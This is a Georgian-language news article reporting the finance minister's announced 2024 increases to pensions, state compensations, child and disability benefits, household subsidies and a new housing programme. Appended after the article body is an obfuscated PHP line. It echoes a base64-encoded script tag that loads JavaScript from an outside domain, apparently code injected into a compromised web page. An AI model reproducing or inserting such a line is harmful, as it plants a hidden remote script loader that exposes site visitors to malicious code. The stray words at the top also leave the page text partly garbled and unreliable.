celsiusi
ავერსი საქკაბელი

ფინანსთა მინისტრ ლაშა ხუციშვილის განცხადებით, 2024 წელს გაზრდილია გასაცემლების მოცულობები, როგორც პენსიების, ასევე, სახელმწიფო კომპენსაციების ნაწილში, კერძოდ:

  • 70 წლის და მეტი ასაკის პირთა პენსია იზრდება 50 ლარით და განისაზღვრება 415 ლარის ოდენობით. მაღალმთიან დასახლებებში ამ პირთა პენსიის მოცულობა თითქმის 500 ლარს მიაღწევს;
  • 70 წლამდე პირთა პენსია იზრდება 20 ლარით და შეადგენს 315 ლარს, ხოლო მაღალმთიან დასახლებებში 378 ლარს;
  • ბოლო 4 წლის განმავლობაში საპენსიო გასაცემლების მნიშვნელოვანი ზრდაა. კერძოდ, 70 წლამდე პირებისთვის ზრდა 43%-ია, ხოლო 70 წლის და მეტი ასაკის პირებისთვის პენსიის ზრდა 66%-ია.

ლაშა ხუციშვილის განცხადებით, პენსიებისგან განსხვავებით, წლების განმავლობაში ნაკლებად ხდებოდა კომპენსაციების გადაანგარიშება. მისი თქმით, წარმოდგენილ ბიუჯეტში მაღალი ეკონომიკური ზრდის შედეგად მიღებული შემოსავლები, მაქსიმალურად არის გადანაწილებული მოსახლეობის ყველა იმ კატეგორიაზე, ვინც სახელმწიფოსგან დახმარებას საჭიროებს.

„მოგეხსენებათ, სახელმწიფო კომპენსაციების ბენეფიციართა უდიდესი ნაწილი ყოფილი ჯარისკაცები და პოლიციელები არიან, რომელთაც, საშუალოდ, 25 წელზე მეტი აქვთ ნამსახურები შესაბამის სტრუქტურებში; ზემოაღნიშნულის გათვალისწინებით ბიუჯეტში უკვე აისახა შესაბამისი თანხები და მომდევნო წელს:

  • სახელმწიფო კომპენსაციებისთვის დღეს არსებული 560 ლარიანი ზღვარი იზრდება 78%-ზე მეტით და განისაზღვრება 1000 ლარის ოდენობით;
  • 200 ლარით გაიზრდება და 1200 ლარი გახდება საომარი მოქმედებების დროს ან კრიმინალთან ბრძოლის დროს დაღუპულთა ოჯახის წევრების კომპენსაციები;
  • იზრდება პოლიციელებისა და ჯარისკაცების ნამსახურების თითოეულ წელზე გათვლილი თანხის ოდენობა, კერძოდ:
  • უმცროს სპეციალურ წოდებაზე (გარდა ოფიცრისა): 2-დან 5 ლარამდე;
  • უმცროსი ოფიცრის წოდებაზე: 5-დან 10 ლარამდე;
  • უფროსი ოფიცრის წოდებაზე: 10-დან 15 ლარამდე;
  • უმაღლესი ოფიცრის წოდებაზე: 15-დან 25 ლარამდე;

ზემოაღნიშნული ცვლილებების შედეგად, პოლიციელებისა და ჯარისკაცების კომპენსაციის საშუალო მაჩვენებელი 430 ლარიდან 580 ლარამდე გაიზრდება.

აღსანიშნავია, რომ ეს არის საშუალო მაჩვენებელი და მაღალი წოდების მქონე პირთა კომპენსაცია უფრო მაღალი იქნება და რიგ შემთხვევებში, 1000 ლარს მიაღწევს“, - აღნიშნა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა.

ლაშა ხუციშვილის განცხადებით, მიზნობრივი ჯგუფების სოციალური დახმარებებისთვის გამოყოფილი მილიარდ 519 მილიონი ლარიდან 578 მილიონი ლარი მიიმართება სოციალურად დაუცველთა ბაზაში 16 წლამდე ასაკის ბავშვების დახმარებებზე.

„მოგეხსენებათ, აღნიშნული დამხარება თითოეულ ბავშვზე 2020 წელს შეადგენდა 50 ლარს, ხოლო წელს პირველი ივლისიდან მისი ოდენობა 4-ჯერ არის გაზრდილი და 200 ლარს შეადგენს. გარდა ბავშვთა დახმარებისა, სოციალურად დაუცველი ოჯახების დახმარებებისთვის გათვალისწინებულია 267 მილიონი ლარი. გასულ წელს, პარლამენტის მიერ დამტკიცებული საკანონმდებლო ცვლილებების გათვალისწინებით, სახელმწიფო პენსიის შესაბამისად, იზრდება შეზღუდული შესაძლებლობის მქონე პირთა სოციალური გასაცემლებიც, კერძოდ, 18 წლამდე ასაკის, ასევე, მკვეთრად გამოხატული შეზღუდული შესაძლებლობის მქონე პირთა გასაცემელი იზრდება 50 ლარით, ხოლო დანარჩენი კატეგორიების გასაცემელი 20 ლარის ოდენობით; ჯამში, შეზღუდული შესაძლებლობის მქონე პირთა გასაცემლებზე 2024 წელს მიიმართება 365 მლნ ლარზე მეტი“, - განაცხადა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა.

მისი თქმით, მიზნობრივი სოციალური დახმარებების ფარგლებში, 2024 წელს, ასევე, იზრდება საყოფაცხოვრებო სუბსიდიის მოცულობაც.

„საყოფაცხოვრებო სუბსიდიის მიმღები ძირითადი კატეგორია პოლიტიკური რეპრესიების მსხვერპლთა ოჯახის წევრები, ასევე, 9 აპრილს დაზარალებულები არიან. აღნიშნული საკითხი დაყენებულ იქნა ბიუჯეტის პირველადი ვარიანტის განხილვისას და გადამუშავებულ ვარიანტში გათვალისწინებულია სუბსიდიის ზრდა. მოგეხსენებათ, საყოფაცხოვრებო სუბსიდია თანხობრივად დაყოფილია 3 კატეგორიად და მომდევნო წელს დაგეგმილია სამივე კატეგორიის გაზრდა, კერძოდ:

  • 7 ლარიანი სუბსიდია იზრდება 40 ლარამდე;
  • 22 ლარიანი სუბსიდია განისაზღვრება 60 ლარით;
  • 44 ლარიანი სუბსიდია იზრდება 80 ლარამდე.

გარდა ზემოაღნიშნულისა, სოციალური დახმარებების ფარგლებში, მნიშვნელოვანი ახალი პროგრამაა გათვალისწინებული. სამწუხაროდ, დღეს ჩვენს ქვეყანაში პირველადი შეფასებით, ათასამდე მრავალშვილიანი ოჯახი ცხოვრობს, რომელთაც არ გააჩნიათ ნორმალური საცხოვრებელი პირობები. აღნიშნულის გათვალისწინებით, ვიწყებთ ახალ პროგრამას, რომლის ფარგლებშიც, მომდევნო 2 წლის განმავლობაში შესყიდული იქნება მათთვის საჭირო საცხოვრებელი ფართები, სადაც ამ ოჯახებს და მათ მცირეწლოვან ბავშვებს, შეეძლებათ ღირსეულ პირობებში ცხოვრება. 2024 წელს ახალი პროგრამის დასაფინანსებლად გამოყოფილია 25 მილიონი ლარი“, - განაცხადა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა.

2131
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");